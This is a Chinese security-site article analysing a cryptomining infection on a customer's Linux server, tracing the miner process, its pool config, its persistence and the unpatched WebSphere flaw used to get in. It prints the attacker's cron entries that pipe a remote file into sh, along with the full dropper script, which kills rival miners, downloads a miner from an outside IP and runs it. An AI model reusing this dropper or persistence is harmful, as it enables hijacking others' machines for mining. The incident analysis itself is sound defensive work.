<dl id="opymh"></dl>

<div id="opymh"></div>
      <div id="opymh"><tr id="opymh"></tr></div>

        <em id="opymh"><ins id="opymh"><mark id="opymh"></mark></ins></em><sup id="opymh"><menu id="opymh"></menu></sup>

        <em id="opymh"></em>

        <em id="opymh"><ol id="opymh"></ol></em>

              频道栏目
              首页 > 安全 > 系统安全 > 正文

              Linux系统ETN挖矿病毒实例分析

              2018-04-17 10:57:08           
              收藏   我要投稿

              Linux系统ETN挖矿病毒实例分析

              一背景

              近期客户向华屹安全团队通报其服务器运行异常经过安全技术人员的检查发现了这是一例典型的利用Linux服务器漏洞实施XMR挖矿的安全事件当前网络安全事件中黑客利用系统漏洞实施挖矿的事件频见报道而本团队在实际工作中却头回遇见因此对该样本实施了具体分析

              二技术具体分析

              1主机环境为Linux

              2发现一异常进程其运行情况为

              ./kswapd0 -c ksvjptcyah.cf -t 2

              连接的端口是148.251.133.246的80

              利用IP查询发现其是德国的服务器具体如下图所示

              \

              直接用浏览器访问其返回的是mining server online如下图所示由此可见该服务器应该是一台矿池服务器

              \

              还发现该服务器还开放5555端口(返回和80端口一致)8080端口用浏览器直接访问8080端口发现其是electroneum矿池其主页返回如下图所示

              \

              3发现进程kswapd0位于/var/tmp目录下该目录下同时还存放ksvjptcyah.cf文件其中ksvjptcyah.cf文件的内容如下所示

              ksvjptcyah.cf内容

              {

              "url" : "stratum+tcp://148.251.133.246:80",

              "user" :"etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc",

              "pass" : "x",

              "algo" : "cryptonight",

              "quiet" : true

              }

              显然这是挖矿程序的配置文件

              其中矿池地址为148.251.133.246:80

              挖矿帐号为etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc

              Quiet表示在后台安静的挖矿

              在该矿池的界面通过搜索发现该帐号挖矿的具体情况如下图所示

              \

              如上图所示挖的是ETN币每秒的hash rate为159.45KH说明该病毒至少感染了成百上千台了(如果假设一台主机60-1000H/S的情况)

              4利用kill杀掉kswapd0进程

              过一会发现又出来相同异常进程进程会变化

              ./ Ksvjptcyah -c Ksvjptcyah .cf -t 2

              5查找其启动方式根据以往经验一般病毒会利用定时任务启动

              果然发现启动任务如下

              */29 * * * * wget -O - -q/Article/UploadPic/2018-4/2018416184522986.jpg|sh

              */30 * * * * curl/Article/UploadPic/2018-4/2018416184522986.jpg|sh

              利用ip138查询发现181.214.87.241是一台位于美国或者智利的机器查询结果如下图所示

              \

              对其直接利用浏览器访问现实的是apache ubuntu 缺省页面如下图所示

              \

              浏览器直接访问/Article/UploadPic/2018-4/2018416184522986.jpg显示该图片因错误无法显示结果如下图所示

              \

              用curl直接下载回本地发现其内容如下

              oracle.jpg的内容

              id1="adcixstgtf"

              id2="ksvjptcyah"

              id3="kswapd0"

              rm -rf /var/tmp/vmstat

              rm -rf /var/tmp/`echo $id1`.conf

              ps auxf|grep -v grep|grep -v `echo$id2`|grep "/tmp/"|awk '{print $2}'|xargs kill -9

              ps auxf|grep -v grep|grep "\-px"|awk '{print $2}'|xargs kill -9

              ps auxf|grep -v grep|grep"stratum"|awk '{print $2}'|xargs kill -9

              ps auxf|grep -v grep|grep"cryptonight"|awk '{print $2}'|xargs kill -9

              ps auxf|grep -v grep|grep `echo$id1`|awk '{print $2}'|xargs kill -9

              ps -fe|grep `echo $id2`|grep -v grep

              if [ $? -ne 0 ]

              then

              echo "start process....."

              chmod 777 /var/tmp/`echo $id2`.cf

              rm -rf /var/tmp/`echo $id2`.cf

              curl -o /var/tmp/`echo $id2`.cfhttp://181.214.87.241/java/`echo $id3`.cf

              wget -O /var/tmp/`echo $id2`.cfhttp://181.214.87.241/java/`echo $id3`.cf

              chmod 777 /var/tmp/`echo $id3`

              rm -rf /var/tmp/`echo $id3`

              cat /proc/cpuinfo|grep aes>/dev/null

              if [ $? -ne 1 ]

              then

              curl -o /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`

              wget -O /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`

              else

              curl -o /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`_an

              wget -O /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`_an

              fi

              chmod +x /var/tmp/`echo $id3`

              cd /var/tmp

              proc=`grep -c ^processor /proc/cpuinfo`

              cores=$((($proc+1)/2))

              ./`echo $id3` -c `echo $id2`.cf -t `echo$cores` >/dev/null &

              else

              echo "Running....."

              fi

              通过分析该sh脚本发现该程序首先分析本地机器是否已经存在其他的挖矿软件如果存在就先杀掉(当我财路者格杀勿论…)

              然后从181.214.87.241服务器下载配置文件和挖矿程序

              黑客还判断其cpu 情况cores=$((($proc+1)/2))说明黑客只利用了主机一半多的CPU资源用于挖矿给机器主人留下一点可用的资源(?#20013;?#30340;机器主人没有反应…你好我也好…)

              6服务器如何被感染的?

              安全技术人员通过对该服务器?#33041;?#27425;分析发现其websphere软件没有补丁黑客是利用该软件的java 反序列漏洞直接控制本服务器

              上一篇AMD 芯片被曝大量安全漏洞Linux 之父怒评
              下一篇Linux 服务器惊现比特币勒索事件做?#30431;?#28857;可免遭损失
              相关文章
              图文推荐

              关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报?#34892;?/a>

              版权所有: 红黑联盟--致力于做实用的IT技术学习网站

              ٷͧü
              <dl id="opymh"></dl>

              <div id="opymh"></div>
                  <div id="opymh"><tr id="opymh"></tr></div>

                    <em id="opymh"><ins id="opymh"><mark id="opymh"></mark></ins></em><sup id="opymh"><menu id="opymh"></menu></sup>

                    <em id="opymh"></em>

                    <em id="opymh"><ol id="opymh"></ol></em>

                          <dl id="opymh"></dl>

                          <div id="opymh"></div>
                              <div id="opymh"><tr id="opymh"></tr></div>

                                <em id="opymh"><ins id="opymh"><mark id="opymh"></mark></ins></em><sup id="opymh"><menu id="opymh"></menu></sup>

                                <em id="opymh"></em>

                                <em id="opymh"><ol id="opymh"></ol></em>